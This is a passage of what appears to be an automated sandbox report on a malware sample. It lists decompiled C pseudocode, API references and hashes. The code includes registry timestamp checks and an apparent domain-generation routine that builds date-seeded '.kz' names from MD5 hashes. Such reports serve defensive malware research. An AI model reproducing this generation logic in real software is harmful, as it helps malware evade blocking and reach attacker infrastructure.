                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5E09275D04308EBEB04DFF4D94DB9D7B78EB08205F504694E545B2140D6786A54CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                          			E04007250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                                                                                          				signed int _v68;
                                                                                                                                                                                                                                                                          				intOrPtr* _v72;
                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                                                                          				short* _t69;
                                                                                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 1;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                          					_t58 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          					_v12 = _t58;
                                                                                                                                                                                                                                                                          					E04007D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                          					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                          					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                                          					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                          					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                          						_v48 = 0x10;
                                                                                                                                                                                                                                                                          						_v44 = 0x10;
                                                                                                                                                                                                                                                                          						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                          							_v72 =  &_v64;
                                                                                                                                                                                                                                                                          							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                          							_t91 = _v72;
                                                                                                                                                                                                                                                                          							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                          							_t68 = _t101;
                                                                                                                                                                                                                                                                          							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                          							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                          							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                          							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                          							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                          							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                          							_t70 = E04009910();
                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                          							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                          							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                          								_v5 = 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                                          0x04007256
                                                                                                                                                                                                                                                                          0x0400725e
                                                                                                                                                                                                                                                                          0x040073af
                                                                                                                                                                                                                                                                          0x040073b5
                                                                                                                                                                                                                                                                          0x04007285
                                                                                                                                                                                                                                                                          0x04007295
                                                                                                                                                                                                                                                                          0x04007298
                                                                                                                                                                                                                                                                          0x0400729d
                                                                                                                                                                                                                                                                          0x040072a8
                                                                                                                                                                                                                                                                          0x040072bd
                                                                                                                                                                                                                                                                          0x040072c3
                                                                                                                                                                                                                                                                          0x040072c6
                                                                                                                                                                                                                                                                          0x040072d6
                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                          0x040072df
                                                                                                                                                                                                                                                                          0x04007301
                                                                                                                                                                                                                                                                          0x04007307
                                                                                                                                                                                                                                                                          0x0400730e
                                                                                                                                                                                                                                                                          0x04007331
                                                                                                                                                                                                                                                                          0x0400733c
                                                                                                                                                                                                                                                                          0x04007343
                                                                                                                                                                                                                                                                          0x04007349
                                                                                                                                                                                                                                                                          0x0400734c
                                                                                                                                                                                                                                                                          0x0400734f
                                                                                                                                                                                                                                                                          0x04007353
                                                                                                                                                                                                                                                                          0x04007358
                                                                                                                                                                                                                                                                          0x0400735e
                                                                                                                                                                                                                                                                          0x04007364
                                                                                                                                                                                                                                                                          0x0400736a
                                                                                                                                                                                                                                                                          0x0400736f
                                                                                                                                                                                                                                                                          0x04007374
                                                                                                                                                                                                                                                                          0x0400737a
                                                                                                                                                                                                                                                                          0x04007380
                                                                                                                                                                                                                                                                          0x04007383
                                                                                                                                                                                                                                                                          0x0400738b
                                                                                                                                                                                                                                                                          0x04007393
                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007301

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040072BD
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 040072F9
                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 04007329
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007343
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 040073A9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                          • Opcode ID: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                          • Instruction ID: 1589668eb117d9c12aae7036857c9bc1fd79cd220dc98d09134ced9bc9b72130
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE414C74900208EFEB08DF94D885BEDBBB5FF48300F14C569E915AB281D779AA45CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040073C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_t24 = _a4;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          						_v20 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                          						_t26 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          						_v8 = _t26;
                                                                                                                                                                                                                                                                          						E04007D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                          						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                          						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          						if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                          						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                          						if(_t24 == 0) {
                                                                                                                                                                                                                                                                          							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                          							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                          							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                          0x040073ca
                                                                                                                                                                                                                                                                          0x040073e4
                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                          0x04007401
                                                                                                                                                                                                                                                                          0x04007404
                                                                                                                                                                                                                                                                          0x04007409
                                                                                                                                                                                                                                                                          0x04007414
                                                                                                                                                                                                                                                                          0x04007429
                                                                                                                                                                                                                                                                          0x04007432
                                                                                                                                                                                                                                                                          0x04007442
                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                          0x0400744b
                                                                                                                                                                                                                                                                          0x04007465
                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                          0x04007473
                                                                                                                                                                                                                                                                          0x0400748b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007495
                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                          0x0400749e

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 04007429
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 04007465
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007473
                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400748B
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007495
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                          • Instruction ID: 829c9f2afe597629132b3bb77bbcf1684e2940429f06bc569247a29e29dd4590
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 442112B5900208ABEB14DFA4D849FFE77B8FB48704F048558FA15AB180D77DAA44CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04009650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				signed char _v25;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                          						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                          						E04007D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                          						E04009560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                          						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                          						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                          						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                          						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04009656
                                                                                                                                                                                                                                                                          0x04009661
                                                                                                                                                                                                                                                                          0x04009685
                                                                                                                                                                                                                                                                          0x04009696
                                                                                                                                                                                                                                                                          0x04009699
                                                                                                                                                                                                                                                                          0x040096b1
                                                                                                                                                                                                                                                                          0x040096bc
                                                                                                                                                                                                                                                                          0x040096cf
                                                                                                                                                                                                                                                                          0x040096d4
                                                                                                                                                                                                                                                                          0x040096df
                                                                                                                                                                                                                                                                          0x040096ef
                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                          0x0400970a
                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                          0x04009728

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009690
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 040096DF
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 040096E9
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009701
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009719
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                          • Instruction ID: 5d62f8ff5c671b513c9f4ed5768570a6b0eac4432c67e9f412687076ede29f23
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D213DB1900349EFEB14CFA4D884BEE7BB5FF44305F148558E914A7281D378AA94CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040092E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v172;
                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                          					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                          					_t46 = E040097E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                          					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                          					_v12 = _t46 + _a12;
                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                          					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                          						E04007D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                          						_t50 = E04008BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                          						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                          						_v40 = _t50;
                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v172;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                          						E04009650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                          						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                          						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x040092e9
                                                                                                                                                                                                                                                                          0x040092f4
                                                                                                                                                                                                                                                                          0x04009308
                                                                                                                                                                                                                                                                          0x0400931d
                                                                                                                                                                                                                                                                          0x04009322
                                                                                                                                                                                                                                                                          0x04009328
                                                                                                                                                                                                                                                                          0x0400932b
                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                          0x04009357
                                                                                                                                                                                                                                                                          0x04009371
                                                                                                                                                                                                                                                                          0x04009376
                                                                                                                                                                                                                                                                          0x04009379
                                                                                                                                                                                                                                                                          0x04009380
                                                                                                                                                                                                                                                                          0x04009396
                                                                                                                                                                                                                                                                          0x04009382
                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                          0x040093a8
                                                                                                                                                                                                                                                                          0x040093c4
                                                                                                                                                                                                                                                                          0x040093c9
                                                                                                                                                                                                                                                                          0x040093db
                                                                                                                                                                                                                                                                          0x040093e7
                                                                                                                                                                                                                                                                          0x040093f0
                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                          0x040093fe

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04009308
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,.kz), ref: 040093DB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                          • String ID: .kz
                                                                                                                                                                                                                                                                          • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                                          • Opcode ID: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                          • Instruction ID: bb0d42d70b93f9fb2e2ab601979b3322a165a8cda29c6817b22e5740edda4972
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D310AB1E00209EBEF08DF94C885BEEB7B5EF58304F10C159E515B7281E678AA85CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 10002468
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 100024B2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 544645111-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                          • Instruction ID: 1bc0fa0ef2482510480b6d00c0adc5d74525c4f8bff966f143e9313f40c37061
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21DEB0905249EFEF14CF94C984BAEBBB5FF44384F208599D909A7248C774AF80DB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                          			E040078D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                          						_t31 = E04007B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                                                                          						L0400B1EC();
                                                                                                                                                                                                                                                                          						_v20 = _t31;
